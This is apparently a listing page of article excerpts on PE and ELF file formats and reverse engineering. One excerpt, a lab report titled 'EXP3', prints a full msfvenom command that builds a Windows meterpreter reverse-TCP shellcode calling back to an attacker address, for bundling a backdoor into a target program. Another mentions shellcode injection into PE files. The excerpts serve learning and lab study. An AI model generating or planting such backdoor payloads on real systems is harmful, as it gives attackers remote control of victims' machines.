ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP

  • PE格式: VA地址与FOA地址2022-07-26 10:01:38

    PE格式是 Windows下最常用的可执行文件格式,理解PE文件格式不仅可以了解操作系统的加载流程,还可以更好的理解操作系统对进程和内存相关的管理知识,而有些技术必须建立在了解PE文件格式的基础上,如文件加密与解密,病毒分析,外挂技术等。 首先我们先来演示一下内存VA地址与FOA地址

  • PE文件结构从初识到简单shellcode注入2022-06-29 13:36:46

    本文首发自:https://tttang.com/archive/1553/ 前言 ​ 将自己学习的PE文件结构进行总结形成文章这件事情,一直躺在我的Notion TodoList里,但是一直是未完成的状态哈哈,拖了那么久也该让它状态变成已完成了。 PE文件简介 ​ PE文件的全称是Portable Executable,意为可移植的可执行的文

  • Linux下ELF文件简单介绍2022-06-25 14:00:19

    引言 最开始有在树莓派中看见ELF文件,故在此进行记录 ELF文件介绍 Executable and Linkable Format 可执行链接格式(ELF),是Unix系统实验室(USL)作为应用程序二进制接口而开发和发布的。 ELF目标文件有三种类型: 可重定位文件:保存代码和适当的数据,用来和其他object文件一起创建一

  • 逆向工程核心原理2022-06-23 10:35:09

    一.熟悉调试器 1.设置“大本营”的四种方法 每次重新运行调试器,都会回到程序的入口点,为方便使用,可以设置某个重要的点(地址),使调试可以快速转到设置点上。 (1)Goto命令 记录设置大本营的地址,执行Go to(Ctrl + G)命令,输入地址,使光标定位到该地址,按F4,让调试流运行到该处。 (2)设置断点 按F2

  • EXP32022-05-03 23:00:06

    实验效果 ✅将后门程序和目标程序捆绑在一起,实现运行目标程序时回连攻击机的目的 shellcode的生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4314 -f hex 通过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4314命令

  • ELF文件格式第三讲,节头(section header)2021-10-04 15:34:32

    目录ELF文件格式第三讲,节头(section header)一丶节头1.1 概念简介1.2 节头和节1.3 节头 结构1.4特殊节区 ELF文件格式第三讲,节头(section header) 一丶节头 1.1 概念简介 ​ 段(segment) 和 节(section)是有区别的。 节不是段。 段是程序执行的必要组成部分。 在每个段中会有代码或者

  • PE扩大节区的方法2021-04-17 22:35:52

    PE结钩我就不多说了,网上有资料,这里只讲操作性的东西,也就是说本文适合有一定pe基础的学习者。 本次案例工具于原料有 ollydebug、CFF Explorer、WinHex以及本次用来修改的程序   下载地址:http://pan-yz.chaoxing.com/share/info/bb01f4df96e8f1f8 插入洞穴代码,我们一般会通过增

  • 《逆向工程核心原理》第18.19章——UPack PE文件头详细描述、UPack调试——查找EOP2020-12-21 21:06:04

    UPack PE文件头详细描述 UPack说明比较PE文件头重叠文件头IMAGE_FILE_HEADER.SizeOfOptionalHeaderIMAGE_OPTIONAL_HEADER.NumberOfRvaAndSizesIMAGE_SECTION_HEADER重叠节区RVA to RAW导入表(IMAGE_IMPORT_DESCRIPTOR array)导入地址表 INT与IAT到底有什么区别呢?UPack调试—

  • 如何修改PE头加载DLL2020-12-06 16:32:07

    查看PE文件的导入目录表(IDT) 1.查看PE文件的IDT,每一个DLL对应一个IID(20个字节,十六进制下为14),如果原IDT有足够空间,则可以直接在原IDT后面添加DLL,如果没有足够空间,那么需要将IDT迁移至程序空白区域。一个IDT包含多个IID,最后是一个20字节的空白区域,所以说足够空间的意思就是当你加入

  • ELF File2020-08-05 23:34:47

    目录简介ELF文件格式数据格式字符表示(以32位为主)ELF HeaderProgram Header Table基地址-Base Address段内容Section Header TableSectionsProgram LoadingProgram LinkDynamic LinkerProgram Execution Flow内容来源 简介 ELF(Executable and Linkable Format)文件,是linux中的目标文

  • ELF文件格式解析2020-03-26 09:04:16

    copy from : https://blog.csdn.net/mergerly/article/details/94585901   1. ELF文件简介 首先,你需要知道的是所谓对象文件(Object files)有三个种类: 可重定位的对象文件(Relocatable file)这是由汇编器汇编生成的 .o 文件。后面的链接器(link editor)拿一个或一些 Relocatab

  • 从可执行文件中删除.reloc节区2020-03-08 16:04:34

    删除.reloc节区头           删除

  • ELF头文件2019-09-23 22:54:59

    一.4种ELF文件类型   ELF文件类型说明实例 Relocatable File 包含例代码和数据,可以被链接成可执行文件或共享目标文件 Linux下的.o文件 Executable File 包含可以直接执行的程序,ELF可执行文件,一般没有扩展名 /bin/bash文件 Shared Object File 包含代码和数据,和其他目标

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有